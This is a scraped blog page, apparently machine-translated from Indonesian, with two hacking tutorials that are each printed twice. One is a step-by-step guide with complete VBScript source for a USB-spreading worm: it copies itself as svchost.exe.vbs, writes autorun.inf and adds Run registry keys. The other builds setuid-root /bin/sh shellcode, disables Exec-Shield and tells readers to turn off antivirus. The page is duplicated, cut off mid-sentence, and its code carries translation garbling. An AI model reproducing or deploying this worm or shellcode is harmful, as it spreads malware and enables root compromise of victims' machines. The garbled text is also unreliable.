Some anti-virus programs mistakenly pick up parts of Cheat Engine as a trojan/virus. It's best to disable your anti-virus before installing or running Cheat Engine
This installer makes use of the OpenCandy software recomendation plugin
Tuesday, April 6, 2010
Monday, April 5, 2010
Making Virus With VBScript
To create a virus is not too difficult just using notepad only tool we have been able to make a virus. But it would be nice if we understand a little of programming languages such as Visual Basic. Before we discuss further advance the writer will explain the working principle of viruses in general.
Working Principle Virus
1. Viruses basically just a program or script programming as well as programs that often we find: Ms Word, Excel, Corel and others. It's just made for the purpose of this program is not good even damaging.
2. The size is so small that the virus program enough for introduction into the flash or disk icon that is used and is usually very similar to the shape such as word documents or folders.
Note the picture below
At first sight can not distinguish where the original folder where not and where the original document and which the virus.
Now look at the display in the Folder and Document View Details
Folder icon or documents with the Application Type and Screen Saver is guaranteed to be virus. Because the maker and screen saver applications install folder icon or the word must have a less good faith.
3. Usually these viruses masquerading under the name of an existing file in your flash or diskette, while your original documents hidden in a hidden file. For how to bring these hidden files you can see in the blog without anti-virus Prevent Viruses
4. When you double-click virus virus program will be executed. The first step is to open a document that the virus is hidden to reduce the user's suspicion.
5. The next virus will copy itself to the hard drive and write the registry at HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run or HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run so that the virus program is executed automatically when the computer first turns on.
6. If necessary Virus Task manager and regedit to disable to prevent users from manually remove the virus
7. The next virus will be activated to check if there is a new document file in flash or diskette in every few seconds, which would then be hidden and then copy the virus file and name in accordance with this hidden file name. The virus also will write the script in the flash Autorun.inf is hidden so that the virus is automatically executed when the flash is in the double-click the My Computer
So demikiankah cycle virus from pendrive to the computer and from computer to pendrive
About VB Script
VB Script or Visual Basic Script is really just plain text that contains the code of visual basic programming language and stored with vbs format. To create a vbscript simple enough to use a text editor such as Notepad or using a more complete, such as Ultra Edit or Notepad + +. Here is an example of a simple vbscript.
1. Open the Notepad program from Start> All Programs> Accessories> Notepad.
2. Write the following text
MsgBox "This is a sample VB Script Simplified"
3. Then save the file with the change Save as Type to All Files
4. Give the file a name with an extra. Vbs behind. For example ScriptSederhanan.vbs
5. Now look at the display icons in file explorer, no longer in the form of text. Try to click 2 times the file, then the dialog box will appear saying This is a sample VB Script Simple.
6. Required for the vbscript to be virus code so that the right is just follow the process described above.
Simple Virus Code Examples
Here is a sample code using vbscript a simple virus. If you want to try should turn off Anti-virus on also Install Deep Freeze and freeze the entire hard drive later
'El Magnifico MAN
on error resume next
mysource dim, winpath, flashdrive, fs, mf, ATR, tf, RG, nt, check, sd
ATR = "[autorun]" & vbcrlf & "ShellExecute = wscript.exe svchost.exe.vbs"
set fs = createobject ("Scripting.FileSystemObject")
set mf = fs.getfile (Wscript.ScriptFullname)
dim text, size
size = mf.size
check =
set text = mf.openastextstream (1, -2)
do while not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbcrlf
Set winpath = fs.getspecialfolder (0)
set tf = fs.getfile (winpath & "\ svchost.exe.vbs")
tf.attributes = 32
set tf = fs.createtextfile (winpath & "\ svchost.exe.vbs", 2, true)
tf.write mysource
sets tf = fs.getfile (winpath & "\ svchost.exe.vbs")
tf.attributes = 39
For Each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf = fs.getfile (flashdrive.path & "\ svchost.exe.vbs")
tf.attributes = 32
set tf = fs.createtextfile (flashdrive.path & "\ svchost.exe.vbs", 2, true)
tf.write mysource
set tf = fs.getfile (flashdrive.path & "\ svchost.exe.vbs")
tf.attributes = 39
set tf = fs.getfile (flashdrive.path & "\ autorun.inf")
tf.attributes = 32
set tf = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true)
ATR tf.write
set tf = fs.getfile (flashdrive.path & "\ autorun.inf")
tf.attributes = 39
end if
set of RG = createobject ("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ svchost", winpath & "\ svchost.exe.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ MS32DLL", ""
rg.regwrite "HKCR \ vbsfile \ DefaultIcon \", "shell32.dll, 3"
if check <> 1 then
Wscript.sleep 100,000
end if
loop while check <> 1
set sd = createobject ("") winpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname
do while year (now)> = 2008
WScript.sleep 20000th
MsgBox "Eliminate the UN to improve education in Indonesia" & vbcrlf & _
"Because a lot happens in the UN political fraud and schools" & vbcrlf & _
"To raise the prestige schools. Even in certain districts," & vbcrlf & _
"Cheating is sanctioned by the district government is" & vbcrlf & _
vbcrlf & vbcrlf & _
"NATIONAL EXAM unselect" & vbcrlf & vbcrlf & _
"The voice of the teacher concerned on the education system"
Working Principle Virus
1. Viruses basically just a program or script programming as well as programs that often we find: Ms Word, Excel, Corel and others. It's just made for the purpose of this program is not good even damaging.
2. The size is so small that the virus program enough for introduction into the flash or disk icon that is used and is usually very similar to the shape such as word documents or folders.
Note the picture below
At first sight can not distinguish where the original folder where not and where the original document and which the virus.
Now look at the display in the Folder and Document View Details
Folder icon or documents with the Application Type and Screen Saver is guaranteed to be virus. Because the maker and screen saver applications install folder icon or the word must have a less good faith.
3. Usually these viruses masquerading under the name of an existing file in your flash or diskette, while your original documents hidden in a hidden file. For how to bring these hidden files you can see in the blog without anti-virus Prevent Viruses
4. When you double-click virus virus program will be executed. The first step is to open a document that the virus is hidden to reduce the user's suspicion.
5. The next virus will copy itself to the hard drive and write the registry at HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run or HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run so that the virus program is executed automatically when the computer first turns on.
6. If necessary Virus Task manager and regedit to disable to prevent users from manually remove the virus
7. The next virus will be activated to check if there is a new document file in flash or diskette in every few seconds, which would then be hidden and then copy the virus file and name in accordance with this hidden file name. The virus also will write the script in the flash Autorun.inf is hidden so that the virus is automatically executed when the flash is in the double-click the My Computer
So demikiankah cycle virus from pendrive to the computer and from computer to pendrive
About VB Script
VB Script or Visual Basic Script is really just plain text that contains the code of visual basic programming language and stored with vbs format. To create a vbscript simple enough to use a text editor such as Notepad or using a more complete, such as Ultra Edit or Notepad + +. Here is an example of a simple vbscript.
1. Open the Notepad program from Start> All Programs> Accessories> Notepad.
2. Write the following text
MsgBox "This is a sample VB Script Simplified"
3. Then save the file with the change Save as Type to All Files
4. Give the file a name with an extra. Vbs behind. For example ScriptSederhanan.vbs
5. Now look at the display icons in file explorer, no longer in the form of text. Try to click 2 times the file, then the dialog box will appear saying This is a sample VB Script Simple.
6. Required for the vbscript to be virus code so that the right is just follow the process described above.
Simple Virus Code Examples
Here is a sample code using vbscript a simple virus. If you want to try should turn off Anti-virus on also Install Deep Freeze and freeze the entire hard drive later
'El Magnifico MAN
on error resume next
mysource dim, winpath, flashdrive, fs, mf, ATR, tf, RG, nt, check, sd
ATR = "[autorun]" & vbcrlf & "ShellExecute = wscript.exe svchost.exe.vbs"
set fs = createobject ("Scripting.FileSystemObject")
set mf = fs.getfile (Wscript.ScriptFullname)
dim text, size
size = mf.size
check =
set text = mf.openastextstream (1, -2)
do while not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbcrlf
Set winpath = fs.getspecialfolder (0)
set tf = fs.getfile (winpath & "\ svchost.exe.vbs")
tf.attributes = 32
set tf = fs.createtextfile (winpath & "\ svchost.exe.vbs", 2, true)
tf.write mysource
sets tf = fs.getfile (winpath & "\ svchost.exe.vbs")
tf.attributes = 39
For Each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf = fs.getfile (flashdrive.path & "\ svchost.exe.vbs")
tf.attributes = 32
set tf = fs.createtextfile (flashdrive.path & "\ svchost.exe.vbs", 2, true)
tf.write mysource
set tf = fs.getfile (flashdrive.path & "\ svchost.exe.vbs")
tf.attributes = 39
set tf = fs.getfile (flashdrive.path & "\ autorun.inf")
tf.attributes = 32
set tf = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true)
ATR tf.write
set tf = fs.getfile (flashdrive.path & "\ autorun.inf")
tf.attributes = 39
end if
set of RG = createobject ("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ svchost", winpath & "\ svchost.exe.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ MS32DLL", ""
rg.regwrite "HKCR \ vbsfile \ DefaultIcon \", "shell32.dll, 3"
if check <> 1 then
Wscript.sleep 100,000
end if
loop while check <> 1
set sd = createobject ("") winpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname
do while year (now)> = 2008
WScript.sleep 20000th
MsgBox "Eliminate the UN to improve education in Indonesia" & vbcrlf & _
"Because a lot happens in the UN political fraud and schools" & vbcrlf & _
"To raise the prestige schools. Even in certain districts," & vbcrlf & _
"Cheating is sanctioned by the district government is" & vbcrlf & _
vbcrlf & vbcrlf & _
"NATIONAL EXAM unselect" & vbcrlf & vbcrlf & _
"The voice of the teacher concerned on the education system"
Shellcode (I): Local Exploit Shellcode
Often seen in the source code shellcode exploits shaped string of hex codes. Actually what it shellcode and what the meaning behind the hex codes? In this article I will explain about the shellcode and we will also learn to make shellcode own practice.
Shellcode, Exploits and Vulnerability
Shellcode, exploit and vulnerability are 3 siblings. It all started from the negligence of the programmer so that the program contains a vulnerability that can be exploit to make the program run any desired code hacker (arbitrary code execution), this code is called with the shellcode.
Under normal circumstances, the program follow the instructions made by its creator (programmer). Hackers can create a program to follow his orders and ignoring orders mengexploit creator with a vulnerability caused arbitrary code execution
Why called shellcode? If hackers can make a program execute any code he wants, then the code if it chooses? The best choice is a code that gives her shell so she can give other commands that he would freely. Therefore it is called shell-code code.
When likened misile: exploits are missiles, while the shellcode is the warheads that could be charged with anything like explosives, nuclear, biological weapon or chemical weapon is up to the attacker desires.
Although generally giving the shell shellcode, shellcode does not always give the shell. Attacker is free to determine what code will be executed in the victim's computer. Shellcode can do anything from deleting files, formatting the hard drive, sending the data, install new programs etc is up to the attacker desires.
Arbitrary Code Execution
Arbitrary code execution is a condition in which the attacker can inject arbitrary code / instructions in a process that was running, then code is executed. Code that is injected is called the shellcode. Shellcode is code in the form of machine language or opcode. This opcode is usually not written in a binary value because it will become very long, but use a more compact hex value.
Between the Code and Data
Actually the code is also data whose contents are the computer executable instructions. In memory, internally, the data and code makes no difference because both are just a string of symbols 1 and 0.
Let me give a simple example: Is the value 50 hex or binary 01,010,000 in a memory location that is code or data?
When the 50 hex character is considered as a data type, so it was an ascii code for the letter 'P'.
When considered as a code 50 hex, then it is a PUSH EAX instruction (in 32 bit mode) or PUSH AX (in 16 bit mode).
Likewise with the string "ABCD", can be regarded as data or code, note the example below:
1. $ perl -e 'print "ABCD"'|xxd
2. 0000000: 4142 4344 ABCD
3. $ perl -e 'print "ABCD"'|ndisasm -b 16 -
4. 00000000 41 inc cx
5. 00000001 42 inc dx
6. 00000002 43 inc bx
7. 00000003 44 inc sp
8. $ perl -e 'print "ABCD"'|ndisasm -b 32 -
9. 00000000 41 inc ecx
10. 00000001 42 inc edx
11. 00000002 43 inc ebx
12. 00000003 44 inc esp
In the example above ABCD is internally stored as 0 × 41, 0 × 42, 0 × 43 and 0 × 44, ie the ASCII code of character 'A', 'B', 'C', 'D' (see row 2). But the same data can also be considered as a code 16 bits or 32 bits as in line 4 s / d to-7 for 16-bit code and a line to-9 s / d 12 to 32-bit code.
Now the question is when a data is treated as data and when treated as a code? The answer is when a data designated by the instruction pointer or program counter that normally exist in the EIP register (IP 16-bit system), then the data in that location is the code that will be executed.
Any data residing in memory location whose address is stored in the EIP will be considered as a code.
As a demonstration, a small program below demonstrates that the data could also be regarded as a code when appointed by the EIP.
There is an interesting little program above, namely the variable containing the string str ABCHIJK plus ASCII coded character 0xc3. On line 4, str variable is used as an argument to the function printf (), in this case means str is considered as data. While on the 5th row, str summoned as a function, in this case considered as code str. Note that str is true of type pointer to char, but can be called like a function because it has been cast to pointer to function with (void (*) (void)).
In the example above we execute existing code in the variable str, it means that we execute code residing in the data area (not area code). Kernel is now applying many of the protections that we can not execute code that is not in a special area of memory for code. In windows environment, known as Data Execution Prevention, and in Linux there is also known as Exec-Shield.
In order for the examples in this article can work, you must turn off the Exec-Shield:
echo "0"> / proc / sys / kernel / exec-shield
Look at pictures below. Such images are the result disassemble with gdb. Seen that the str terletak di lokasi 0 × 8049590. In CALL instruction which there is a function call printf () with str (0 × 8049590) as a function argument. In this case means str is considered as a data type string. However, there are instructions on str CALL to location, this means the program will jump (jump) to the location of str and execute instructions in the location str. In this case means str is considered as a code. Notice also that the str I add \ xc3 at the end of str because \ xc3 ret instruction is the opcode, so the program will return to function and continue to play the main function to complete.
Start Making shellcode
Actually the contents of the variable str in the above program is the shellcode, so we've actually managed to make the first shellcode. Congratulations! However shellcode that we make is not doing anything meaningful because it only INC and DEC then ret. But from these examples at least we have understood that the shellcode is nothing but a string, which is a collection of characters that is also a machine language instruction opcode.
Now we will begin to create a truly shellcode Spawn a shell. In a previous article about my learning assembly already explained how to call the system call interrupt 80 hex. Shellcode that we will create and provide instructions to call the system call. Notice the C language source below which if exercised will Spawn shell.
1. #include
2. #include
3. int main(void) {
4. char* args[] = {"/bin/sh",NULL};
5. setreuid(0,0);
6. execve("/bin/sh",args,NULL);
7. }
The program above will only call the system call setreuid () and execve (). Shellcode that we will create will also be doing the same thing as the source above, the difference is only made in the assembly.
System Call setreuid ()
setreuid () is used to set real and effective UserID. System call is very important because programs that have SUID bit, usually to drop root privileges when it is no longer needed. Therefore, we must restore it before Spawn privileged shell. Declaration setreuid system call () is:
int setreuid(uid_t ruid, uid_t euid);
ruid = real user id
euid = effective user id
Berdasarkan deklarasi system call tersebut, maka register yang harus diisi sebelum melakukan interrupt adalah:
EAX: 0×46 atau 70 (Nomor system call dari file unistd.h)
EBX: 0×0 (Parameter pertama, real uid yaitu 0)
ECX: 0×0 (Parameter kedua, effective uid yaitu 0)
Potongan assembly di bawah ini adalah instruksi untuk memanggil system call setreuid(0,0).
1. ; setreuid(0,0)
2. xor eax,eax
3. mov al,0x46 ; EAX = 0x46
4. xor ebx,ebx ; EBX = 0
5. xor ecx,ecx ; ECX = 0
6. int 0x80
System Call execve ()
Execve is a system call to execute an executable. All data, variables, heap, stack, etc. belong to the process that calls execve will be lost and replaced with the new program is executed. However processID, and open file handle (including stdout, stdin, stderr) bequeathed to the new program is executed. Declaration execve system call is as below:
int execve (const char * filename, const char * argv [], char * const envp []);
There are 3 arguments are required, but we will only use the 2 argument. We fill the envp argument to NULL because we do not require environment variable. Based on the declaration system call, the registers that must be filled before calling an interrupt is:
EAX: 0xb or 11 (system call numbers)
EBX: address of string "/ bin / sh"
Ecx: address an array of strings, ("/ bin / sh", NULL)
EDX: 0 because NULL envp filled.
Assembly snippet below calls execve system call to execute / bin / sh.
1. ; execve("/bin/sh",{"/bin/sh",0x0},0x0)
2. xor eax,eax
3. push eax ; push 0x0
4. push 0x68732f2f ; push "//sh"
5. push 0x6e69622f ; push "/bin"
6. mov ebx,esp ; EBX = ESP = "/bin//sh\x0"
7. push eax ; push 0x0
8. push ebx ; push "/bin//sh\x0"
9. mov ecx,esp ; ECX = ESP = {"/bin//sh\x0",0x0}
10. xor edx,edx ; EDX = 0
11. mov al, 0xb ; EAX = 0xb
12. int 0x80
EBX must be filled with address string containing the name of the executable file that will be executed. We use the stack to make the string "/ bin / / sh" as in the picture above. In this way we will get an executable filename string address in register ESP. The contents of the ESP is then copied into the EBX register. Maybe there who think there is a typo in the string, because there is a double slash before "sh". This is not a typing error, but deliberately so when push right mempush 4 bytes ("/ / sh"), and the excess of the slash is not a problem.
Ecx must be filled with an array of strings ("/ bin / / sh", NULL). Once again, we also use the stack and which has been previously EBX register contains the address string "/ bin / / sh". In the picture above we first have to mempush NULL (0 × 0) into the stack as an array element index to-1, followed by mempush address string "/ bin / / sh" from the EBX as elements of the array index to 0. In this way ESP will contain the address of an array of strings ("/ bin / / sh", NULL). ESP value is copied into ecx register.
Shellcode in the Assembly
Let us combine the pieces of the above assembly to form a complete shellcode as in the assembly source code below.
1. section .text
2. global _start
4. _start:
5. ; setreuid(0,0)
6. xor eax,eax
7. mov al,0x46 ; EAX = 0x46
8. xor ebx,ebx ; EBX = 0
9. xor ecx,ecx ; ECX = 0
10. int 0x80
12. ; execve("/bin/sh",{"/bin/sh",0x0},0x0)
13. xor eax,eax
14. push eax ; push 0x0
15. push 0x68732f2f ; push "//sh"
16. push 0x6e69622f ; push "/bin"
17. mov ebx,esp ; EBX = ESP = "/bin//sh\x0"
18. push eax ; push 0x0
19. push ebx ; push "/bin//sh\x0"
20. mov ecx,esp ; ECX = ESP = {"/bin//sh\x0",0x0}
21. xor edx,edx ; EDX = 0
22. mov al, 0xb ; EAX = 0xb
23. int 0x80
Let us compile and link source above assembly.
1. $ nasm -f elf basicshellcode.asm
2. $ ld -o basicshellcode basicshellcode.o
3. $ sudo chown root:root basicshellcode;sudo chmod 4755 basicshellcode
4. Password:
5. $ ls -l basicshellcode
6. -rwsr-xr-x 1 root root 623 Dec 3 14:52 basicshellcode
7. $ ./basicshellcode
8. sh-3.2# whoami
9. root
10. sh-3.2# exit
Converting OBJDUMP Output to Shellcode
successful! Now the finishing stage, which took the opcode of the above program. We use objdump to this.
$ objdump -M intel -d -j .text ./basicshellcode
./basicshellcode: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: b0 46 mov al,0x46
8048064: 31 db xor ebx,ebx
8048066: 31 c9 xor ecx,ecx
8048068: cd 80 int 0x80
804806a: 31 c0 xor eax,eax
804806c: 50 push eax
804806d: 68 2f 2f 73 68 push 0x68732f2f
8048072: 68 2f 62 69 6e push 0x6e69622f
8048077: 89 e3 mov ebx,esp
8048079: 50 push eax
804807a: 53 push ebx
804807b: 89 e1 mov ecx,esp
804807d: 31 d2 xor edx,edx
804807f: b0 0b mov al,0xb
8048081: cd 80 int 0x80
From the objdump output above, we only need to take the opcode in the middle column and then holding a string. To make it easier to take opcode I make the following one line script:
$ objdump -d ./basicshellcode|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Let us once again with perl verification and ndisasm.
$ perl -e 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"' |ndisasm -u -
00000000 31C0 xor eax,eax
00000002 B046 mov al,0x46
00000004 31DB xor ebx,ebx
00000006 31C9 xor ecx,ecx
00000008 CD80 int 0x80
0000000A 31C0 xor eax,eax
0000000C 50 push eax
0000000D 682F2F7368 push dword 0x68732f2f
00000012 682F62696E push dword 0x6e69622f
00000017 89E3 mov ebx,esp
00000019 50 push eax
0000001A 53 push ebx
0000001B 89E1 mov ecx,esp
0000001D 31D2 xor edx,edx
0000001F B00B mov al,0xb
00000021 CD80 int 0x80
The result is the same, meaning shellcode to be true. Now we proceed to execute shellcode with C program below:
1. char shellcode[] =
2. "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0"
3. "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
4. "\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
5. int main() {
6. ((void (*)(void))shellcode)(); // shellcode()
7. }
$ gcc shellcode4.c -o shellcode4
$ sudo chown root:root shellcode4; sudo chmod 4755 shellcode4
$ ls -l ./shellcode4
-rwsr-xr-x 1 root root 4748 Dec 3 16:25 ./shellcode4
$ ./shellcode4
sh-3.2# whoami
sh-3.2# exit
Okay, we've managed to safely make the shellcode which resulted in local shell. In Section 2, I will explain to a remote exploit shellcode creation.
Shellcode, Exploits and Vulnerability
Shellcode, exploit and vulnerability are 3 siblings. It all started from the negligence of the programmer so that the program contains a vulnerability that can be exploit to make the program run any desired code hacker (arbitrary code execution), this code is called with the shellcode.
Under normal circumstances, the program follow the instructions made by its creator (programmer). Hackers can create a program to follow his orders and ignoring orders mengexploit creator with a vulnerability caused arbitrary code execution
Why called shellcode? If hackers can make a program execute any code he wants, then the code if it chooses? The best choice is a code that gives her shell so she can give other commands that he would freely. Therefore it is called shell-code code.
When likened misile: exploits are missiles, while the shellcode is the warheads that could be charged with anything like explosives, nuclear, biological weapon or chemical weapon is up to the attacker desires.
Although generally giving the shell shellcode, shellcode does not always give the shell. Attacker is free to determine what code will be executed in the victim's computer. Shellcode can do anything from deleting files, formatting the hard drive, sending the data, install new programs etc is up to the attacker desires.
Arbitrary Code Execution
Arbitrary code execution is a condition in which the attacker can inject arbitrary code / instructions in a process that was running, then code is executed. Code that is injected is called the shellcode. Shellcode is code in the form of machine language or opcode. This opcode is usually not written in a binary value because it will become very long, but use a more compact hex value.
Between the Code and Data
Actually the code is also data whose contents are the computer executable instructions. In memory, internally, the data and code makes no difference because both are just a string of symbols 1 and 0.
Let me give a simple example: Is the value 50 hex or binary 01,010,000 in a memory location that is code or data?
When the 50 hex character is considered as a data type, so it was an ascii code for the letter 'P'.
When considered as a code 50 hex, then it is a PUSH EAX instruction (in 32 bit mode) or PUSH AX (in 16 bit mode).
Likewise with the string "ABCD", can be regarded as data or code, note the example below:
1. $ perl -e 'print "ABCD"'|xxd
2. 0000000: 4142 4344 ABCD
3. $ perl -e 'print "ABCD"'|ndisasm -b 16 -
4. 00000000 41 inc cx
5. 00000001 42 inc dx
6. 00000002 43 inc bx
7. 00000003 44 inc sp
8. $ perl -e 'print "ABCD"'|ndisasm -b 32 -
9. 00000000 41 inc ecx
10. 00000001 42 inc edx
11. 00000002 43 inc ebx
12. 00000003 44 inc esp
In the example above ABCD is internally stored as 0 × 41, 0 × 42, 0 × 43 and 0 × 44, ie the ASCII code of character 'A', 'B', 'C', 'D' (see row 2). But the same data can also be considered as a code 16 bits or 32 bits as in line 4 s / d to-7 for 16-bit code and a line to-9 s / d 12 to 32-bit code.
Now the question is when a data is treated as data and when treated as a code? The answer is when a data designated by the instruction pointer or program counter that normally exist in the EIP register (IP 16-bit system), then the data in that location is the code that will be executed.
Any data residing in memory location whose address is stored in the EIP will be considered as a code.
As a demonstration, a small program below demonstrates that the data could also be regarded as a code when appointed by the EIP.
1. #include
2. char str[] = "ABCHIJK\xc3";
3. int main(void) {
4. printf("%s\n",str); // str as argument of printf()
5. ((void (*)(void))str)(); // str()
6. return 0;
7. }
3. int main(void) {
4. printf("%s\n",str); // str as argument of printf()
5. ((void (*)(void))str)(); // str()
6. return 0;
7. }
$ gcc codedata.c -o codedata
$ ./codedata
$ ./codedata
There is an interesting little program above, namely the variable containing the string str ABCHIJK plus ASCII coded character 0xc3. On line 4, str variable is used as an argument to the function printf (), in this case means str is considered as data. While on the 5th row, str summoned as a function, in this case considered as code str. Note that str is true of type pointer to char, but can be called like a function because it has been cast to pointer to function with (void (*) (void)).
In the example above we execute existing code in the variable str, it means that we execute code residing in the data area (not area code). Kernel is now applying many of the protections that we can not execute code that is not in a special area of memory for code. In windows environment, known as Data Execution Prevention, and in Linux there is also known as Exec-Shield.
In order for the examples in this article can work, you must turn off the Exec-Shield:
echo "0"> / proc / sys / kernel / exec-shield
Look at pictures below. Such images are the result disassemble with gdb. Seen that the str terletak di lokasi 0 × 8049590. In
Start Making shellcode
Actually the contents of the variable str in the above program is the shellcode, so we've actually managed to make the first shellcode. Congratulations! However shellcode that we make is not doing anything meaningful because it only INC and DEC then ret. But from these examples at least we have understood that the shellcode is nothing but a string, which is a collection of characters that is also a machine language instruction opcode.
Now we will begin to create a truly shellcode Spawn a shell. In a previous article about my learning assembly already explained how to call the system call interrupt 80 hex. Shellcode that we will create and provide instructions to call the system call. Notice the C language source below which if exercised will Spawn shell.
1. #include
2. #include
3. int main(void) {
4. char* args[] = {"/bin/sh",NULL};
5. setreuid(0,0);
6. execve("/bin/sh",args,NULL);
7. }
The program above will only call the system call setreuid () and execve (). Shellcode that we will create will also be doing the same thing as the source above, the difference is only made in the assembly.
System Call setreuid ()
setreuid () is used to set real and effective UserID. System call is very important because programs that have SUID bit, usually to drop root privileges when it is no longer needed. Therefore, we must restore it before Spawn privileged shell. Declaration setreuid system call () is:
int setreuid(uid_t ruid, uid_t euid);
ruid = real user id
euid = effective user id
Berdasarkan deklarasi system call tersebut, maka register yang harus diisi sebelum melakukan interrupt adalah:
EAX: 0×46 atau 70 (Nomor system call dari file unistd.h)
EBX: 0×0 (Parameter pertama, real uid yaitu 0)
ECX: 0×0 (Parameter kedua, effective uid yaitu 0)
Potongan assembly di bawah ini adalah instruksi untuk memanggil system call setreuid(0,0).
1. ; setreuid(0,0)
2. xor eax,eax
3. mov al,0x46 ; EAX = 0x46
4. xor ebx,ebx ; EBX = 0
5. xor ecx,ecx ; ECX = 0
6. int 0x80
System Call execve ()
Execve is a system call to execute an executable. All data, variables, heap, stack, etc. belong to the process that calls execve will be lost and replaced with the new program is executed. However processID, and open file handle (including stdout, stdin, stderr) bequeathed to the new program is executed. Declaration execve system call is as below:
int execve (const char * filename, const char * argv [], char * const envp []);
There are 3 arguments are required, but we will only use the 2 argument. We fill the envp argument to NULL because we do not require environment variable. Based on the declaration system call, the registers that must be filled before calling an interrupt is:
EAX: 0xb or 11 (system call numbers)
EBX: address of string "/ bin / sh"
Ecx: address an array of strings, ("/ bin / sh", NULL)
EDX: 0 because NULL envp filled.
Assembly snippet below calls execve system call to execute / bin / sh.
1. ; execve("/bin/sh",{"/bin/sh",0x0},0x0)
2. xor eax,eax
3. push eax ; push 0x0
4. push 0x68732f2f ; push "//sh"
5. push 0x6e69622f ; push "/bin"
6. mov ebx,esp ; EBX = ESP = "/bin//sh\x0"
7. push eax ; push 0x0
8. push ebx ; push "/bin//sh\x0"
9. mov ecx,esp ; ECX = ESP = {"/bin//sh\x0",0x0}
10. xor edx,edx ; EDX = 0
11. mov al, 0xb ; EAX = 0xb
12. int 0x80
EBX must be filled with address string containing the name of the executable file that will be executed. We use the stack to make the string "/ bin / / sh" as in the picture above. In this way we will get an executable filename string address in register ESP. The contents of the ESP is then copied into the EBX register. Maybe there who think there is a typo in the string, because there is a double slash before "sh". This is not a typing error, but deliberately so when push right mempush 4 bytes ("/ / sh"), and the excess of the slash is not a problem.
Ecx must be filled with an array of strings ("/ bin / / sh", NULL). Once again, we also use the stack and which has been previously EBX register contains the address string "/ bin / / sh". In the picture above we first have to mempush NULL (0 × 0) into the stack as an array element index to-1, followed by mempush address string "/ bin / / sh" from the EBX as elements of the array index to 0. In this way ESP will contain the address of an array of strings ("/ bin / / sh", NULL). ESP value is copied into ecx register.
Shellcode in the Assembly
Let us combine the pieces of the above assembly to form a complete shellcode as in the assembly source code below.
1. section .text
2. global _start
4. _start:
5. ; setreuid(0,0)
6. xor eax,eax
7. mov al,0x46 ; EAX = 0x46
8. xor ebx,ebx ; EBX = 0
9. xor ecx,ecx ; ECX = 0
10. int 0x80
12. ; execve("/bin/sh",{"/bin/sh",0x0},0x0)
13. xor eax,eax
14. push eax ; push 0x0
15. push 0x68732f2f ; push "//sh"
16. push 0x6e69622f ; push "/bin"
17. mov ebx,esp ; EBX = ESP = "/bin//sh\x0"
18. push eax ; push 0x0
19. push ebx ; push "/bin//sh\x0"
20. mov ecx,esp ; ECX = ESP = {"/bin//sh\x0",0x0}
21. xor edx,edx ; EDX = 0
22. mov al, 0xb ; EAX = 0xb
23. int 0x80
Let us compile and link source above assembly.
1. $ nasm -f elf basicshellcode.asm
2. $ ld -o basicshellcode basicshellcode.o
3. $ sudo chown root:root basicshellcode;sudo chmod 4755 basicshellcode
4. Password:
5. $ ls -l basicshellcode
6. -rwsr-xr-x 1 root root 623 Dec 3 14:52 basicshellcode
7. $ ./basicshellcode
8. sh-3.2# whoami
9. root
10. sh-3.2# exit
Converting OBJDUMP Output to Shellcode
successful! Now the finishing stage, which took the opcode of the above program. We use objdump to this.
$ objdump -M intel -d -j .text ./basicshellcode
./basicshellcode: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: b0 46 mov al,0x46
8048064: 31 db xor ebx,ebx
8048066: 31 c9 xor ecx,ecx
8048068: cd 80 int 0x80
804806a: 31 c0 xor eax,eax
804806c: 50 push eax
804806d: 68 2f 2f 73 68 push 0x68732f2f
8048072: 68 2f 62 69 6e push 0x6e69622f
8048077: 89 e3 mov ebx,esp
8048079: 50 push eax
804807a: 53 push ebx
804807b: 89 e1 mov ecx,esp
804807d: 31 d2 xor edx,edx
804807f: b0 0b mov al,0xb
8048081: cd 80 int 0x80
From the objdump output above, we only need to take the opcode in the middle column and then holding a string. To make it easier to take opcode I make the following one line script:
$ objdump -d ./basicshellcode|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Let us once again with perl verification and ndisasm.
$ perl -e 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"' |ndisasm -u -
00000000 31C0 xor eax,eax
00000002 B046 mov al,0x46
